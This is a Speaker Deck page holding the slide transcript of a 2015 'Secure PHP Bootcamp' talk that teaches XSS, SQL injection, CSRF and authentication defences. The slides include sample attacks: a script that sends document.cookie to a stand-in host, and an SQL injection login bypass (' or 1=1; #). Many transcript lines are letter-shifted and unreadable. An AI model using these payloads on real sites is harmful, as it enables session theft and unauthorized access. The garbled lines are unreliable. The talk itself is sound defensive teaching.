Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Secure PHP Bootcamp
Search
Chris Cornutt
January 23, 2015
Technology
0
670
Secure PHP Bootcamp
Given at PHP Benelux 2015
Chris Cornutt
January 23, 2015
Tweet
Share
More Decks by Chris Cornutt
See All by Chris Cornutt
Securing Legacy Applications
ccornutt
0
160
Pentesting for Developers
ccornutt
0
160
Securing Legacy Applications - Longhorn PHP 2018
ccornutt
1
210
Pieces of Auth
ccornutt
0
360
Securing Legacy Applications
ccornutt
0
530
Build Security In
ccornutt
0
230
Introduction to Slim 3
ccornutt
0
180
Securing Legacy Applications
ccornutt
0
32
PHP Security, Redfined
ccornutt
0
300
Other Decks in Technology
See All in Technology
JTCにおける内製×スクラム開発への挑戦〜内製化率95%達成の舞台裏/JTC's challenge of in-house development with Scrum
aeonpeople
0
270
2025/09/16 仕様駆動開発とAI-DLCが導くAI駆動開発の新フェーズ
masahiro_okamura
0
140
下手な強制、ダメ!絶対! 「ガードレール」を「檻」にさせない"ガバナンス"の取り方とは?
tsukaman
2
460
EncryptedSharedPreferences が deprecated になっちゃった!どうしよう! / Oh no! EncryptedSharedPreferences has been deprecated! What should I do?
yanzm
0
490
20250910_障害注入から効率的復旧へ_カオスエンジニアリング_生成AIで考えるAWS障害対応.pdf
sh_fk2
3
280
スマートファクトリーの第一歩 〜AWSマネージドサービスで 実現する予知保全と生成AI活用まで
ganota
2
320
Modern Linux
oracle4engineer
PRO
0
160
株式会社ログラス - 会社説明資料【エンジニア】/ Loglass Engineer
loglass2019
4
65k
2つのフロントエンドと状態管理
mixi_engineers
PRO
3
160
新規プロダクトでプロトタイプから正式リリースまでNext.jsで開発したリアル
kawanoriku0
1
220
エンジニアリングマネージャーの成長の道筋とキャリア / Developers Summit 2025 KANSAI
daiksy
3
1.1k
dbt開発 with Claude Codeのためのガードレール設計
10xinc
2
1.3k
Featured
See All Featured
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
29
2.9k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
31
2.2k
Why Our Code Smells
bkeepers
PRO
339
57k
Automating Front-end Workflow
addyosmani
1370
200k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
15
1.7k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
53
3k
Product Roadmaps are Hard
iamctodd
PRO
54
11k
Java REST API Framework Comparison - PWX 2021
mraible
33
8.8k
Fashionably flexible responsive web design (full day workshop)
malarkey
407
66k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
29
1.9k
Mobile First: as difficult as doing things right
swwweet
224
9.9k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
33
2.4k
Transcript
Secure PHP Development $ISJT$PSOVUU!FOZHNB
https://jetbrains.com
Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT
1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN
IUUQCJUMZPXBTQUPQ
5IFSF`T OPTVDIUIJOH BTTFDVSF
IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO
IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN
None
XSS: Cross Site Scripting
*OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH
Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>
Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);
xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG
Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );
echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU
Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)
}} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH
SQLi: SQL Injection
*OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH
Example $sql = ‘select id from users where username =
“‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #
BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH
BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X
Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where
username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU
CSRF: Cross Site Request Forgery
VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF TJNQMF SBOEPNJ[FE GPSFBDIGPSN
Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>
<input type=“submit” value=“Register”/> </form>
Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>
<input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>
Auth*: Authentication & Authorization
EJSFDUPCKFDUSFGFSFODF " EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU
QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT
None
None
And…
4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET
5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN